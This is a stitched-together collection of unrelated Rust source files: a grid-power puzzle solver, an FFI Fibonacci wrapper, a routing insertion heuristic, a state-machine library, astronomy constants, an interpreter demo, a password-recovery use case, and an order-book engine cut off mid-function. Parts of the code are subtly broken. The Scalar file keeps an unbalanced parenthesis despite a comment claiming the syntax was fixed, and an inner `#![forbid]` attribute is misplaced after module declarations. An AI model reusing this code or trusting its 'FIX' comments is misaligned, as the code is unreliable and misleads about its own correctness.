    let mut grid: [[i32; 300]; 300] = [[0; 300]; 300];
    for y in 1..=300i32 {
        for x in 1..=300i32 {
            let rack_id = x + 10;
            // Hundreds digit of ((rack_id * y + serial) * rack_id), minus 5.
            let power_level = ((rack_id * y + serial_number) * rack_id % 1000) / 100 - 5;
            grid[y as usize - 1][x as usize - 1] = power_level;
        }
    }
    // Scan every 3x3 square for the maximum total power. Top-left corners
    // range over 0..=297 so the square stays inside the 300x300 grid; the
    // previous `0..297` bound skipped the last valid row and column.
    let mut max_square_power = 0;
    let mut max_y = 0;
    let mut max_x = 0;
    for y in 0..298 {
        for x in 0..298 {
            let mut square_power = 0;
            for square_y in 0..3 {
                for square_x in 0..3 {
                    square_power += grid[y + square_y][x + square_x];
                }
            }
            if square_power > max_square_power {
                max_square_power = square_power;
                max_y = y;
                max_x = x;
            }
        }
    }
    // Report 1-based coordinates, matching the puzzle's convention.
    println!("{}: ({},{})", max_square_power, max_x + 1, max_y + 1);
    // Dump the winning 3x3 square for inspection.
    for y in max_y..max_y + 3 {
        print!("[");
        print!("{}", grid[y][max_x]);
        for x in max_x + 1..max_x + 3 {
            print!(",{}", grid[y][x]);
        }
        println!("]");
    }
}
|
use fibonacci_sys as fibo;
use libc;
/// Safe wrapper around the C `Fibonacci_t` sequence generator.
pub struct Fibonacci {
    // Owned pointer obtained from `fibo_new`; released in `Drop`.
    handle: *mut fibo::Fibonacci_t,
}
impl Fibonacci {
    /// Allocates a new generator via the C library.
    pub fn new() -> Self {
        let handle = unsafe { fibo::fibo_new() };
        Self { handle }
    }

    /// Advances the generator and returns the next Fibonacci number.
    pub fn next(&mut self) -> u32 {
        unsafe { fibo::fibo_next(self.handle) }
    }
}
impl Drop for Fibonacci {
    /// Releases the C-allocated handle.
    fn drop(&mut self) {
        // NOTE(review): assumes `fibo_new` allocates with malloc so that
        // `libc::free` is the matching deallocator — confirm against the
        // C API; a dedicated `fibo_free` would be safer if it exists.
        unsafe {
            libc::free(self.handle as *mut core::ffi::c_void);
        }
        // NOTE(review): debug print left in; consider removing for release.
        println!("free()");
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    // First ten Fibonacci numbers, as produced by the C implementation.
    #[test]
    fn fibonacci_test() {
        let expects: [u32; 10] = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34];
        let mut fibo = Fibonacci::new();
        for &e in expects.iter() {
            assert_eq!(fibo.next(), e);
        }
    }
}
|
/// Runs the program on the provided "Input" argument, or prints author
/// contact information when none is given.
fn main() {
    let arguments = jude_omenai::matches();
    if let Some(value) = arguments.value_of("Input") {
        jude_omenai::run(value);
    } else {
        println!("name: Jude Omenai, email: jdonmarie@gmail.com");
    }
}
|
use super::SourceStream;
use crate::Result;
use bytes::Bytes;
use std::fs::File;
use std::io::Read;
use std::time::Instant;
/// A `SourceStream` backed by a local file read in fixed-size chunks.
pub struct FileSourceStream {
    file: File,
}
impl FileSourceStream {
    /// Opens the file at `url` for streaming.
    pub fn open(url: &str) -> Result<Self> {
        Ok(FileSourceStream {
            file: File::open(url)?,
        })
    }
}
impl SourceStream for FileSourceStream {
    /// Reads the next fixed-size (1316-byte) chunk from the file.
    ///
    /// Returns `None` once a full chunk can no longer be read (EOF or a
    /// read error) so the stream ends cleanly; the previous `unwrap()`
    /// panicked at end of file even though the trait returns `Option`.
    fn receive(&mut self) -> Option<(Instant, Bytes)> {
        let mut data = vec![0; 1316];
        match self.file.read_exact(&mut data) {
            Ok(()) => Some((Instant::now(), Bytes::from(data))),
            Err(_) => None,
        }
    }
}
|
pub mod gfx;
pub mod texture_array;
pub mod texture_region;
pub mod shader;
pub mod quads;
pub use self::shader::*;
pub use self::texture_array::*;
pub use self::texture_region::*;
pub use self::quads::*;
use image::Rgba;
use puck_core::Mat4;
use puck_core::color::Color;
/// Converts an engine `Color` into an `image` crate RGBA pixel.
/// NOTE(review): constructs `Rgba` via its `data` field, which is specific
/// to older `image` crate versions; newer versions use a tuple struct.
pub fn as_rgba8(color:Color) -> Rgba<u8> {
    Rgba { data: color.raw() }
}
/// Narrows a 4x4 matrix of f64 into f32, element by element.
pub fn down_size_m4(arr: [[f64; 4];4]) -> [[f32; 4]; 4] {
    let mut out: [[f32; 4]; 4] = [[0.0; 4]; 4];
    for (dst_row, src_row) in out.iter_mut().zip(arr.iter()) {
        for (dst, src) in dst_row.iter_mut().zip(src_row.iter()) {
            *dst = *src as f32;
        }
    }
    out
}
/// A single vertex as consumed by the gfx pipeline.
pub type Vertex = self::gfx::Vertex;
/// CPU-side vertex buffer contents.
pub type BufferData = Vec<Vertex>;
/// 4x4 transform matrix.
pub type Transform = Mat4;
#[derive(Copy, Clone, Debug)]
/// Per-draw uniform values handed to the shader.
pub struct Uniforms {
    pub transform : Transform,
    pub color: Color,
}
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
pub enum Blend {
None,
Add,
Alpha,
} |
#[derive(Copy, Clone)]
/// The primitive kinds a `Scalar` can hold.
/// (Fixed a syntax error: the opening `{` was missing after the enum name.)
pub enum ScalarType {
    Boolean,
    Char,
    Float,
    Integer,
    String, // This may eventually have to be its own DataType
}
/// A primitive type
pub struct Scalar {
    name: String,          // user-facing identifier of this scalar
    scalar_type: ScalarType // which primitive kind the scalar holds
}
impl Scalar {
    /// Creates a scalar with the given name and primitive type.
    fn new(name: &str, scalar_type: ScalarType) -> Scalar {
        Scalar {
            // FIX: `name: name` tried to store a `&str` in a `String` field.
            name: name.to_string(),
            scalar_type,
        }
    }
    /// Returns a copy of the scalar's name.
    fn name(&self) -> String {
        // FIX: returning `self.name` moved the field out of `&self` (E0507).
        self.name.clone()
    }
    /// Returns the scalar's primitive type (`ScalarType` is `Copy`).
    fn scalar_type(&self) -> ScalarType {
        self.scalar_type
    }
}
impl Data for Scalar {
fn data_type(&self) -> DataType {
DataType::Scalar(self.scalar_type))
}
}
|
use crate::construction::heuristics::*;
use crate::construction::Quota;
use crate::models::common::Cost;
use crate::models::problem::Job;
use crate::models::solution::Activity;
use std::sync::Arc;
/// Specifies insertion result variant.
pub enum InsertionResult {
    /// Successful insertion result.
    Success(InsertionSuccess),
    /// Insertion failure.
    Failure(InsertionFailure),
}
/// Specifies insertion success result needed to insert job into tour.
pub struct InsertionSuccess {
    /// Specifies delta cost change for the insertion.
    pub cost: Cost,
    /// Original job to be inserted.
    pub job: Job,
    /// Specifies activities within index where they have to be inserted.
    pub activities: Vec<(Activity, usize)>,
    /// Specifies route context where insertion happens.
    pub context: RouteContext,
}
/// Specifies insertion failure.
pub struct InsertionFailure {
    /// Failed constraint code (-1 when no specific constraint is identified).
    pub constraint: i32,
    /// A flag which signalizes that algorithm should stop trying to insert at next positions.
    pub stopped: bool,
    /// Original job failed to be inserted (`None` when no job could be evaluated at all).
    pub job: Option<Job>,
}
/// Implements generalized insertion heuristic.
/// Using `JobSelector`, `RouteSelector`, and `ResultSelector` it tries to identify next job to
/// be inserted until there are no jobs left or it is not possible to insert due to constraint
/// limitations.
pub struct InsertionHeuristic {
    // strategy used to evaluate candidate (job, route) insertions
    insertion_evaluator: Box<dyn InsertionEvaluator + Send + Sync>,
}
impl Default for InsertionHeuristic {
    /// Uses `PositionInsertionEvaluator` as the default evaluation strategy.
    fn default() -> Self {
        InsertionHeuristic::new(Box::new(PositionInsertionEvaluator::default()))
    }
}
impl InsertionHeuristic {
    /// Creates a new instance of `InsertionHeuristic`.
    pub fn new(insertion_evaluator: Box<dyn InsertionEvaluator + Send + Sync>) -> Self {
        Self { insertion_evaluator }
    }
}
impl InsertionHeuristic {
    /// Runs common insertion heuristic algorithm using given selector specializations.
    /// Inserts one evaluated result per iteration until no required jobs remain
    /// or the optional quota reports it is exhausted.
    pub fn process(
        &self,
        ctx: InsertionContext,
        job_selector: &(dyn JobSelector + Send + Sync),
        route_selector: &(dyn RouteSelector + Send + Sync),
        result_selector: &(dyn ResultSelector + Send + Sync),
        quota: &Option<Arc<dyn Quota + Send + Sync>>,
    ) -> InsertionContext {
        let mut ctx = ctx;
        prepare_insertion_ctx(&mut ctx);
        // Absence of a quota (`None`) means "never reached".
        while !ctx.solution.required.is_empty() && !quota.as_ref().map_or(false, |q| q.is_reached()) {
            // Re-select candidate jobs and routes each round: applying a result
            // changes the solution and may invalidate previous candidates.
            let jobs = job_selector.select(&mut ctx).collect::<Vec<Job>>();
            let routes = route_selector.select(&mut ctx, jobs.as_slice()).collect::<Vec<RouteContext>>();
            let result =
                self.insertion_evaluator.evaluate_all(&ctx, jobs.as_slice(), routes.as_slice(), result_selector);
            apply_insertion_result(&mut ctx, result);
        }
        finalize_insertion_ctx(&mut ctx);
        ctx
    }
}
impl InsertionResult {
    /// Creates result which represents insertion success.
    pub fn make_success(cost: Cost, job: Job, activities: Vec<(Activity, usize)>, route_ctx: RouteContext) -> Self {
        Self::Success(InsertionSuccess { cost, job, activities, context: route_ctx })
    }
    /// Creates result which represents insertion failure.
    /// Uses constraint code -1 ("unspecified"), does not stop, carries no job.
    pub fn make_failure() -> Self {
        Self::make_failure_with_code(-1, false, None)
    }
    /// Creates result which represents insertion failure with given code.
    pub fn make_failure_with_code(code: i32, stopped: bool, job: Option<Job>) -> Self {
        Self::Failure(InsertionFailure { constraint: code, stopped, job })
    }
    /// Compares two insertion results and returns the cheapest by cost.
    /// A success always beats a failure; a cost tie keeps `left`; for two
    /// failures `right` is returned.
    pub fn choose_best_result(left: Self, right: Self) -> Self {
        match (&left, &right) {
            (Self::Success(_), Self::Failure(_)) => left,
            (Self::Failure(_), Self::Success(_)) => right,
            (Self::Success(lhs), Self::Success(rhs)) => {
                if lhs.cost > rhs.cost {
                    right
                } else {
                    left
                }
            }
            _ => right,
        }
    }
}
/// Moves all currently unassigned jobs back into the required list and lets the
/// constraint pipeline refresh the solution state before insertion starts.
pub(crate) fn prepare_insertion_ctx(ctx: &mut InsertionContext) {
    ctx.solution.required.extend(ctx.solution.unassigned.iter().map(|(job, _)| job.clone()));
    ctx.problem.constraint.accept_solution_state(&mut ctx.solution);
}
/// Marks any still-required jobs as unassigned with code -1 and refreshes state.
pub(crate) fn finalize_insertion_ctx(ctx: &mut InsertionContext) {
    finalize_unassigned(ctx, -1);
    ctx.problem.constraint.accept_solution_state(&mut ctx.solution);
}
/// Applies a single insertion result to the context: on success the job's
/// activities are spliced into the chosen route; on failure the job is moved
/// to the unassigned set under the failing constraint code.
pub(crate) fn apply_insertion_result(ctx: &mut InsertionContext, result: InsertionResult) {
    match result {
        InsertionResult::Success(success) => {
            // Register route usage; a route not yet part of the solution is appended.
            let is_new_route = ctx.solution.registry.use_route(&success.context);
            let route_index = ctx.solution.routes.iter().position(|ctx| ctx == &success.context).unwrap_or_else(|| {
                assert!(is_new_route);
                ctx.solution.routes.push(success.context.deep_copy());
                ctx.solution.routes.len() - 1
            });
            let route_ctx = ctx.solution.routes.get_mut(route_index).unwrap();
            let route = route_ctx.route_mut();
            // index + 1: presumably offsets past the tour's start activity — confirm.
            success.activities.into_iter().for_each(|(a, index)| {
                route.tour.insert_at(a, index + 1);
            });
            let job = success.job;
            ctx.solution.required.retain(|j| *j != job);
            ctx.solution.unassigned.remove(&job);
            ctx.problem.constraint.accept_insertion(&mut ctx.solution, route_index, &job);
        }
        InsertionResult::Failure(failure) => {
            if let Some(job) = failure.job {
                ctx.solution.unassigned.insert(job.clone(), failure.constraint);
                ctx.solution.required.retain(|j| *j != job);
            } else {
                // NOTE this happens when evaluator fails to insert jobs due to lack of routes in registry
                finalize_unassigned(ctx, failure.constraint)
            }
        }
    }
}
/// Drains the required list into the unassigned map with the given code,
/// first dropping any jobs already recorded as unassigned.
fn finalize_unassigned(ctx: &mut InsertionContext, code: i32) {
    let unassigned = &ctx.solution.unassigned;
    ctx.solution.required.retain(|job| !unassigned.contains_key(job));
    ctx.solution.unassigned.extend(ctx.solution.required.drain(0..).map(|job| (job, code)));
}
|
/*
A Rust State Machine Library
Copyright (c) 2014 Chong Cheung
Licensed under the MIT license https://github.com/tomcheung789/rust-fsmlite/blob/master/LICENSE
*/
use std::default::Default;
/// A named state with optional enter/leave callbacks.
pub struct State{
    pub name: String,
    pub enter: Option<fn()>, // invoked when this state is entered
    pub leave: Option<fn()>  // invoked when this state is left
}
/// A named transition from any of `from_state` to `to_state` with optional
/// before/after callbacks.
pub struct Event{
    pub name: String,
    pub from_state: Vec<String>, // states this event may fire from
    pub to_state: String,        // state entered after firing
    pub before: Option<fn()>,    // invoked before the transition
    pub after: Option<fn()>      // invoked after the transition
}
/// The state machine; `build()` must succeed before events can be fired.
pub struct Machine{
    pub name: String,
    pub initial_state: Option<String>,
    pub final_state: Option<String>,
    current_state: Option<String>, // None until `build()` succeeds
    pub states: Vec<State>,
    pub events: Vec<Event>,
    ready: bool // set by `build()`; gates `fire`/`can_fire`
}
// Empty-name state with no callbacks.
impl Default for State{
    fn default() -> State{
        State{
            name: "".to_string(),
            enter: None,
            leave: None
        }
    }
}
// Empty-name event with no source states and no callbacks.
impl Default for Event{
    fn default() -> Event{
        Event{
            name: "".to_string(),
            from_state: Vec::new(),
            to_state: "".to_string(),
            before: None,
            after: None
        }
    }
}
// Unbuilt machine: no states, no events, not ready.
impl Default for Machine{
    fn default() -> Machine{
        Machine{
            name: "".to_string(),
            initial_state: None,
            final_state: None,
            current_state: None,
            states: Vec::new(),
            events: Vec::new(),
            ready: false
        }
    }
}
impl Machine{
    /// Validates the machine definition; on success the machine becomes ready
    /// and its current state is set to the initial state.
    ///
    /// FIXES: the original used pre-1.0 `0i` integer literals (no longer valid
    /// Rust) — replaced by counting with iterators.
    pub fn build(&mut self) -> Result<(), String>{
        //check initial_state not null
        if self.initial_state.is_none() { return Err("Initial state cannot be none.".to_string()); }
        //check state not null
        if self.states.is_empty() { return Err("No State is defined.".to_string()); }
        //check state not duplicate
        for s in self.states.iter(){
            let count = self.states.iter().filter(|sl| s.name == sl.name).count();
            if count != 1 { return Err(format!("Duplicate state definition: {}.",s.name)); }
        }
        //check event not null
        if self.events.is_empty() { return Err("No Event is defined.".to_string()); }
        {
            let state_exists = |state: &str| -> bool {
                self.states.iter().any(|s| s.name == state)
            };
            //check event not duplicate, and that every referenced state exists
            for e in self.events.iter(){
                let count = self.events.iter().filter(|el| e.name == el.name).count();
                if count != 1 { return Err(format!("Duplicate event definition: {}.",e.name)); }
                if e.from_state.is_empty() { return Err(format!("No from state is defined in Event {}.", e.name));}
                for fs in e.from_state.iter(){
                    if !state_exists(fs) { return Err(format!("State {} is not defined.", fs)); }
                }
                if !state_exists(&e.to_state) { return Err(format!("State {} is not defined.", e.to_state)); }
            }
        }
        //if final_state is declared, at least one event must lead to it
        if self.final_state.is_some() {
            let final_state = self.final_state.clone().unwrap();
            let count = self.events.iter().filter(|e| e.to_state == final_state).count();
            if count == 0 { return Err("No event is connected to final state.".to_string()); }
        }
        //after checks
        self.current_state = self.initial_state.clone();
        self.ready = true;
        Ok(())
    }
    /// Fires `event`. Callback order: before > leave > enter > after, then the
    /// machine transitions to the event's target state.
    ///
    /// FIXES: the original mutated `self.current_state` while iterating
    /// `self.events` (borrow conflict), used the removed `String::as_slice()`
    /// API, and contained the mis-encoded token `¤t` (originally
    /// `&current`). Data needed from the event is copied out first so the
    /// borrow ends before mutation.
    pub fn fire(&mut self, event: &str) -> Result<(),String>{
        if self.can_fire(event) {
            let current = self.current_state();
            // Copy out target state and callbacks (fn pointers are Copy) so the
            // borrow of `self.events` ends before `self.current_state` changes.
            let fired = self
                .events
                .iter()
                .find(|e| e.name == event)
                .map(|e| (e.to_state.clone(), e.before, e.after));
            if let Some((to_state, before, after)) = fired {
                if let Some(f) = before { f(); } //fire before event
                //fire leave event of the state being left
                if let Some(f) = self.states.iter().find(|s| s.name == current).and_then(|s| s.leave) { f(); }
                //fire enter event of the state being entered
                if let Some(f) = self.states.iter().find(|s| s.name == to_state).and_then(|s| s.enter) { f(); }
                if let Some(f) = after { f(); } //fire after event
                self.current_state = Some(to_state);
            }
            return Ok(());
        }
        if !self.ready { return Err("State machine is not ready.".to_string()); }
        if self.is_finished() { return Err("State machine is finished.".to_string()); }
        Err(format!("Event {} cannot be fired.", event))
    }
    /// Returns true when `event` is defined and may fire from the current state.
    pub fn can_fire(&mut self, event: &str) -> bool{
        if !self.ready { return false; }
        if self.is_finished() { return false; }
        let current = self.current_state();
        self.events
            .iter()
            .filter(|e| e.name == event)
            .any(|e| e.from_state.iter().any(|fs| fs == &current))
    }
    /// Returns the current state name, or "" when no state is set.
    pub fn current_state(&mut self) -> String{
        match self.current_state{
            Some(ref x) => x.clone(),
            None => "".to_string(),
        }
    }
    /// True when a final state is declared and the machine has reached it.
    pub fn is_finished(&mut self) -> bool{
        match (&self.current_state, &self.final_state) {
            (Some(cs), Some(fs)) => !cs.is_empty() && cs == fs,
            _ => false,
        }
    }
}
|
/// Pi
pub const DPI: f64 = 3.141592653589793238462643;
/// 2Pi
pub const D2PI: f64 = 6.283185307179586476925287;
/// Radians to degrees
pub const DR2D: f64 = 57.29577951308232087679815;
/// Degrees to radians
pub const DD2R: f64 = 1.745329251994329576923691e-2;
/// Radians to arcseconds
pub const DR2AS: f64 = 206264.8062470963551564734;
/// Arcseconds to radians
pub const DAS2R: f64 = 4.848136811095359935899141e-6;
/// Seconds of time to radians
pub const DS2R: f64 = 7.272205216643039903848712e-5;
/// Arcseconds in a full circle
pub const TURNAS: f64 = 1296000.0;
/// Milliarcseconds to radians
pub const DMAS2R: f64 = DAS2R / 1e3;
/// Length of tropical year B1900 (days)
pub const DTY: f64 = 365.242198781;
/// Seconds per day.
pub const DAYSEC: f64 = 86400.0;
/// Days per Julian year
pub const DJY: f64 = 365.25;
/// Days per Julian century
pub const DJC: f64 = 36525.0;
/// Days per Julian millennium
pub const DJM: f64 = 365250.0;
/// Reference epoch (J2000.0), Julian Date
pub const DJ00: f64 = 2451545.0;
/// Julian Date of Modified Julian Date zero
pub const DJM0: f64 = 2400000.5;
/// Reference epoch (J2000.0), Modified Julian Date
pub const DJM00: f64 = 51544.5;
/// 1977 Jan 1.0 as MJD
pub const DJM77: f64 = 43144.0;
/// TT minus TAI (s)
pub const TTMTAI: f64 = 32.184;
/// Astronomical unit (m, IAU 2012)
pub const DAU: f64 = 149597870.7e3;
/// Speed of light (m/s)
pub const CMPS: f64 = 299792458.0;
/// Light time for 1 au (s)
pub const AULT: f64 = DAU / CMPS;
/// Speed of light (au per day)
pub const DC: f64 = DAYSEC / AULT;
/// L_G = 1 - d(TT)/d(TCG)
pub const ELG: f64 = 6.969290134e-10;
/// L_B = 1 - d(TDB)/d(TCB), and TDB (s) at TAI 1977/1/1.0
pub const ELB: f64 = 1.550519768e-8;
/// TDB (s) at TAI 1977/1/1.0
pub const TDB0: f64 = -6.55e-5;
/// Schwarzschild radius of the Sun (au)
/// = 2 * 1.32712440041e20 / (2.99792458e8)^2 / 1.49597870700e11
pub const SRS: f64 = 1.97412574336e-8;
/* Reference ellipsoids */
pub const WGS84: std::os::raw::c_int = 1;
pub const GRS80: std::os::raw::c_int = 2;
pub const WGS72: std::os::raw::c_int = 3;
|
// NOTE(review): `AI` is not snake_case (rustc emits a non_snake_case warning);
// renaming would break `crate::AI::...` paths elsewhere, so it is kept as-is.
pub mod AI;
pub mod heuristics;
pub mod tree;
#![forbid(unsafe_code)]
extern crate naam;
use naam::builder::{Build, Builder};
use naam::builtins::Nop;
use naam::cpu::DirectThreadedLoop as Cpu;
use naam::debug_info::Dump;
use naam::tape::UnexpectedEndError;
use naam::{Destination, Execute, Offset, Pc, Program, Runner};
use std::fmt::Debug;
fn main() {
    // Build a tiny program that prints a greeting, loops back twice via the
    // counter in RAM, then halts returning 42.
    let greeting = "Hello, world!".to_owned();
    let source = SayItNTimes(&greeting);
    let program = Program::new(Cpu, vec![], &source).unwrap();
    println!("{:#?}\n", program);
    let mut ram = SayItNTimesRam { rval: 0, counter: 2 };
    program.run(&mut ram);
    assert!(ram.rval == 42);
}
/// Program source: the message to print (N+1 times, driven by RAM's counter).
#[derive(Debug)]
struct SayItNTimes<'a>(&'a str);
impl<'a> Build<Cpu> for SayItNTimes<'a> {
    type Ram = SayItNTimesRam;
    type Error = UnexpectedEndError;
    // Emits the program tape: a no-op, then a print/jump-back loop, then
    // a Return(42) that stores the result into RAM.
    fn build<'tape, 'code>(
        &'code self,
        builder: &mut Builder<'tape, 'code, Cpu, SayItNTimesRam>,
    ) -> Result<(), Self::Error>
    where
        'code: 'tape,
    {
        builder.emit(Nop)?;
        // Record the offset of the print instruction so JumpNTimes can loop to it.
        let print_hello_world = builder.offset();
        builder.emit(PrintLn(self.0))?;
        builder.emit(JumpNTimes(print_hello_world))?;
        builder.emit(Return(42))
    }
}
/// Mutable machine state shared with the running program.
#[derive(Clone, Copy, Debug)]
struct SayItNTimesRam {
    rval: usize,   // result value written by the Return instruction
    counter: usize, // remaining extra iterations for JumpNTimes
}
// Instruction: store the operand into `ram.rval` and halt execution.
#[derive(Clone, Copy, Debug, Dump)]
struct Return(usize);
impl<'tape> Execute<'tape, SayItNTimesRam> for Return {
    fn execute(
        pc: Pc<'tape, Self>,
        runner: Runner<'tape>,
        ram: &mut SayItNTimesRam,
    ) -> Destination<'tape> {
        ram.rval = pc.0;
        // Err(halt) signals the interpreter loop to stop.
        Err(runner.halt())
    }
}
// Instruction: print the embedded string and fall through to the next one.
#[derive(Clone, Copy, Debug, Dump)]
#[repr(transparent)]
struct PrintLn<'code>(&'code str);
impl<'tape, 'code: 'tape, Ram> Execute<'tape, Ram> for PrintLn<'code>
where
    Ram: ?Sized,
{
    #[inline(always)]
    fn execute(pc: Pc<'tape, Self>, _runner: Runner<'tape>, _ram: &mut Ram) -> Destination<'tape> {
        println!("{}", pc.0);
        Ok(pc.next())
    }
}
// Instruction: jump back to the stored offset while `ram.counter` is non-zero,
// decrementing it each time; fall through once it reaches zero.
#[derive(Clone, Copy, Dump)]
#[repr(transparent)]
struct JumpNTimes<'tape>(Offset<'tape>);
// FIX: the impl declared an extra lifetime `'code` that is not constrained by
// the trait, self type, or predicates — rejected by rustc as E0207.
impl<'tape> Execute<'tape, SayItNTimesRam> for JumpNTimes<'tape> {
    fn execute(
        pc: Pc<'tape, Self>,
        runner: Runner<'tape>,
        ram: &mut SayItNTimesRam,
    ) -> Destination<'tape> {
        Ok(if ram.counter > 0 {
            ram.counter -= 1;
            runner.resolve_offset(pc.0)
        } else {
            pc.next()
        })
    }
}
|
use serde::Deserialize;
use uuid::Uuid;
use common::event::EventPublisher;
use common::result::Result;
use crate::domain::user::{Email, Password, UserRepository, UserService};
/// Input for the password-recovery use case.
#[derive(Deserialize)]
pub struct RecoverPasswordCommand {
    pub email: String, // email of the account to recover
}
/// Use case: reset a user's password to a random temporary one.
pub struct RecoverPassword<'a> {
    event_pub: &'a dyn EventPublisher, // publishes the user's domain events
    user_repo: &'a dyn UserRepository, // loads and persists users
    user_serv: &'a UserService,        // hashes the temporary password
}
impl<'a> RecoverPassword<'a> {
    /// Wires the use case with its collaborating ports.
    pub fn new(
        event_pub: &'a dyn EventPublisher,
        user_repo: &'a dyn UserRepository,
        user_serv: &'a UserService,
    ) -> Self {
        RecoverPassword {
            user_repo,
            user_serv,
            event_pub,
        }
    }
    /// Replaces the user's password with a random temporary one.
    ///
    /// Fails when the email is invalid or no user owns it; on success the
    /// user is saved and its pending domain events are published.
    pub async fn exec(&self, cmd: RecoverPasswordCommand) -> Result<()> {
        let email = Email::new(cmd.email)?;
        let mut user = self.user_repo.find_by_email(&email).await?;
        // A fresh UUID serves as the plaintext temporary password.
        let tmp_password = Uuid::new_v4().to_string();
        let hashed_password = self.user_serv.generate_password(&tmp_password)?;
        let password = Password::new(hashed_password)?;
        user.recover_password(password, &tmp_password)?;
        self.user_repo.save(&mut user).await?;
        self.event_pub.publish_all(user.base().events()?).await?;
        Ok(())
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    use crate::mocks;
    // Recovery for an email with no stored user must fail.
    #[tokio::test]
    async fn non_existing_user() {
        let c = mocks::container();
        let uc = RecoverPassword::new(c.event_pub(), c.user_repo(), c.user_serv());
        let user = mocks::user1();
        assert!(uc
            .exec(RecoverPasswordCommand {
                email: user.identity().email().to_string(),
            })
            .await
            .is_err())
    }
    // A stored user gets a new password and exactly one event is published.
    #[tokio::test]
    async fn password_recovery_code_generated() {
        let c = mocks::container();
        let uc = RecoverPassword::new(c.event_pub(), c.user_repo(), c.user_serv());
        let mut user = mocks::user1();
        let old_password = user.identity().password().unwrap().to_string();
        c.user_repo().save(&mut user).await.unwrap();
        assert!(uc
            .exec(RecoverPasswordCommand {
                email: user.identity().email().to_string(),
            })
            .await
            .is_ok());
        // Reload the user to observe the persisted change.
        let user = c.user_repo().find_by_id(&user.base().id()).await.unwrap();
        assert_ne!(user.identity().password().unwrap().value(), old_password);
        assert_eq!(c.event_pub().events().await.len(), 1);
    }
}
|
#![feature(map_first_last)]
use chrono::offset::LocalResult;
use chrono::prelude::*;
use common::bitmap::BitMap;
use crossbeam_channel::unbounded;
use libc::fsync;
use order::proto::{OrderInfo, OrderOp, OrderSide, OrderStatus};
use rust_decimal::prelude::*;
use rust_decimal::Decimal;
use rust_decimal_macros::*;
use serde::{Deserialize, Serialize};
use serde_json::Result;
use std::collections::BTreeMap;
use std::fs::File;
use std::io::prelude::*;
use std::os::unix::io::AsRawFd;
use std::thread;
#[macro_use]
extern crate smart_default;
/// A price level: aggregated quantity plus head/tail slots of the intrusive
/// order list kept inside `OrderBook::orders`.
#[derive(Copy, Clone, Default, Debug, Serialize, Deserialize)]
struct PriceNode {
    qty: Decimal,      // curr node order qty
    price: Decimal,    // curr node price
    order_slot: usize, // curr node order number (head of the slot list)
    last_slot: usize,  // last order slot (tail of the slot list)
}
/// Control signals for the orderbook; defaults to `Closed`.
#[derive(Copy, Clone, Debug, PartialEq, SmartDefault, Serialize, Deserialize)]
pub enum Signal {
    #[default]
    Closed,
    CancelAllOrder,
}
/// A single-market limit order book. Orders live in a slab (`orders`) indexed
/// by slot; each side keeps a BTreeMap price index plus a cached best node.
#[derive(Debug, Serialize, Deserialize)]
pub struct OrderBook {
    market: String, // curr orderbook market ID
    bid_leader: PriceNode, // the best buy price_node
    ask_leader: PriceNode, // the best sell price_node
    orders: Vec<OrderInfo>, // store order array
    order_bitmap: BitMap, // bitmap index of order
    bid_price_index: BTreeMap<Decimal, PriceNode>, // price_node of buy skiplist index
    ask_price_index: BTreeMap<Decimal, PriceNode>, // price_node of sell skiplist index
    // #[serde(skip_serializing)]
    // order_chan: Receiver<Result<OrderInfo>>,
}
/// Messages accepted by the orderbook's worker loop (`OrderBook::run`).
pub enum Msg {
    SimpleOrder(OrderInfo), // new order
    CancelOrder((u64, u64, Decimal)), // cancel order operation: (order_id, uid, price)
    CancelAllOrder, // cancel all order
    Snapshot, // start snapshot signal
}
impl OrderBook {
pub fn new(max_order_num: usize, market: String) -> OrderBook {
//{{{
let orders: Vec<OrderInfo> = vec![OrderInfo::default(); max_order_num];
OrderBook {
market: market,
bid_leader: Default::default(),
ask_leader: Default::default(),
orders: orders,
order_bitmap: BitMap::new(max_order_num),
bid_price_index: BTreeMap::new(),
ask_price_index: BTreeMap::new(),
}
} //}}}
    /// Consumes the book and processes channel messages on a dedicated thread;
    /// the `join()` makes this call block until the worker thread ends.
    pub fn run(self, recv: crossbeam_channel::Receiver<Msg>) {
        //{{{
        thread::spawn(move || loop {
            match recv.recv() {
                Ok(msg) => match msg {
                    Msg::SimpleOrder(o) => {
                        println!("{:?}", o);
                    }
                    Msg::CancelOrder((order_id, uid, price)) => {
                        println!("{}->{}->{}", order_id, uid, price);
                    }
                    Msg::Snapshot => self.snapshot(),
                    Msg::CancelAllOrder => {}
                },
                // recv() only errors once all senders are dropped.
                Err(err) => println!("{:?}", err),
            }
        })
        .join()
        .unwrap();
        return;
    } //}}}
    // orderbook match entry
    // Dispatches an incoming order to the handler for its operation type.
    pub fn match_entry(&mut self, order: &mut OrderInfo) {
        //{{{
        match order.op {
            OrderOp::Limit => self.limit_match(order),
            OrderOp::Market => self.market_match(order),
            OrderOp::Cancel => {
                // the cancelled order returned by `cancel` is discarded here
                self.cancel(order);
            }
        }
    } //}}}
/// limit price match
/// If there are remainning parts after the order is matched. match engine will insert this part into the order book
fn limit_match(&mut self, taker: &mut OrderInfo) {
//{{{
assert_eq!(taker.op, OrderOp::Limit);
match taker.side {
OrderSide::Ask => {
//{{{
// there is no suitable bid order
if self.bid_leader.qty.is_zero()
|| self.bid_leader.price.is_zero()
|| self.bid_leader.price < taker.price
{
self.insert_order(taker);
return;
}
self.bid_leader.qty -= taker.remain_qty;
if !self.bid_leader.qty.is_zero() && self.bid_leader.qty.is_sign_positive() {
// After match. bid leader still remain qty
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = self.bid_leader.order_slot;
if self.orders[maker_slot].remain_qty > taker.remain_qty {
self.orders[maker_slot].trade(taker);
break;
} else {
let record = self.orders[maker_slot].trade(taker).unwrap();
self.order_bitmap.clear(&maker_slot);
let next = self.orders[maker_slot].logic.next_slot;
self.bid_leader.order_slot = next;
self.orders[next].logic.pre_slot = 0;
}
}
// replace price node index
self.bid_price_index
.insert(self.bid_leader.price, self.bid_leader.clone());
} else {
let mut remove_node_key: Decimal = dec!(0);
loop {
//{{{
if !remove_node_key.is_zero() {
self.bid_price_index.remove(&remove_node_key);
remove_node_key = dec!(0);
}
if taker.remain_qty.is_zero() {
break;
}
match self.bid_price_index.last_entry() {
Some(mut entry) => {
let price = *entry.key();
if price < taker.price {
if taker.remain_qty.is_sign_positive() {
self.insert_order(taker);
return;
}
}
let node = entry.get_mut();
node.qty -= taker.remain_qty;
